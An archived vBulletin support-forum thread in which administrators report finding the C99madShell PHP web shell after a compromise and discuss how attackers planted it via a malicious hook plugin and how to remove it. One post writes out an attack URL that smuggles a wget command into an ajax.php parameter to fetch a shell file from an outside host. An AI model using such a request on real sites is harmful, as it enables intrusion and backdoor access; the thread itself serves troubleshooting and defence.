vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Forum and Server Management (https://vborg.vbsupport.ru/forumdisplay.php?f=232)
-   -   C99madShell v. 2.0 madnet edition (https://vborg.vbsupport.ru/showthread.php?t=202532)

ryan.gottlieb 01-21-2009 02:04 AM
C99madShell v. 2.0 madnet edition
 
I upgraded vBulletin 3.8 from 3.7, and now when ever I try to edit subscriptions, this comes up... its a PHP Shell script....

--------------- Added [DATE]1232510889[/DATE] at [TIME]1232510889[/TIME] ---------------

Ok... it was going back to the init.php file, and told me this line


($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false;


I commented that line out (//) and it went away....

--------------- Added [DATE]1232511838[/DATE] at [TIME]1232511838[/TIME] ---------------

solved.... error.php

Dismounted 01-21-2009 03:04 AM
By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.

ryan.gottlieb 01-27-2009 01:33 AM
No, by SOLVED I meant I removed the script.. (The shell script)

Dismounted 01-27-2009 02:58 AM
That still does not solve how the attacker got the file there. Unless you know that already too?

blowy 08-23-2011 10:50 AM
am having this problem as well.....When I try to edit the payments manager I get the above msg

!C99madShell v. 2.0 madnet edition!

Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13

Marco64Th 08-24-2011 03:56 AM
This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.

Crad 08-24-2011 02:01 PM
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

TheLastSuperman 08-24-2011 03:06 PM
Quote:
Originally Posted by Crad (Post 2237445)
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
Tomato, Tomato or Potato, Potato it does not matter, it's malicious and is still something you do not want to see when navigating the admincp or any other part of your site for that matter and tbo I have no clue why you even posted that last snippet of quick whit, nothing to cheer about until you've removed it :erm:.

daydie 08-24-2011 06:27 PM
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap

Marco64Th 08-25-2011 02:51 AM
Quote:
Originally Posted by Crad (Post 2237445)
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
A useless discussion on semantics in my view, the poster that asked the question will understand that it is a serious security issue if i use the word "Trojan".

But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data?

ishare 08-29-2011 06:53 PM
Right now i have the exactly same problem. Does anyone know how to solve this problem please ? I am running my own dedicated server but since am not good with server management, i do not have any idea about what to do on server side if it's not about a file removing or something like that...

vbresults 08-29-2011 08:29 PM
I saw this for the first time on a client's install two or so months ago. None of the vBulletin files were modified and the database was clean so I was stumped at first. It turns out this particular exploit uses vB's plugin/hook system; if you see a strange plugin (note I said plugin, not product), remove it. Then, find out how it got on there. xD

Just read a document on this exploit; bad file permission or upload script setups could allow something like this to happen.

Fortezza 08-30-2011 05:52 AM
I think Shell is malicious :)

Paul M 08-30-2011 08:36 AM
Quote:
Originally Posted by daydie (Post 2237561)
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap
You cannot upload files like that with ajax.php unless someone has already compromised you.

What actually happens is they use sql injection via an unsafe modification to install a plugin on the ajax hook, then use that malicious plugin to install the file.

If you forum directory was properly secured as read only (to apache) then that wget would fail to actually save the file.

gazza2008 03-31-2012 05:31 PM
How would I get rid of this ive been comprimised as well...

Is it in a folder in FTP is it a CODE I can delete etc

TheLastSuperman 03-31-2012 06:33 PM
Quote:
Originally Posted by gazza2008 (Post 2315454)
How would I get rid of this ive been comprimised as well...

Is it in a folder in FTP is it a CODE I can delete etc
Contact your Host and/or hire someone to remove it as this is quite nasty and who knows if you have the same edition (you can modify and add/remove code before uploading a script) and is yours in English or Arabic? I've seen this script in three different languages honestly so long story short if your not experienced in this, it's not ideal for you to try and sort yourself unfortunately :(.

Edit: You can try POST #4 shown in this thread - https://www.vbulletin.com/forum/show...i-e-p0wersurge

Teascu Dorin 09-19-2013 09:11 PM
Look into the PLUGIN MANAGER and check for any suspect plugins installed. I found 4 of them.

This is a period of nasty hacking time.


All times are GMT. The time now is 12:48 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01077 seconds
  • Memory Usage 1,753KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (4)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (17)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete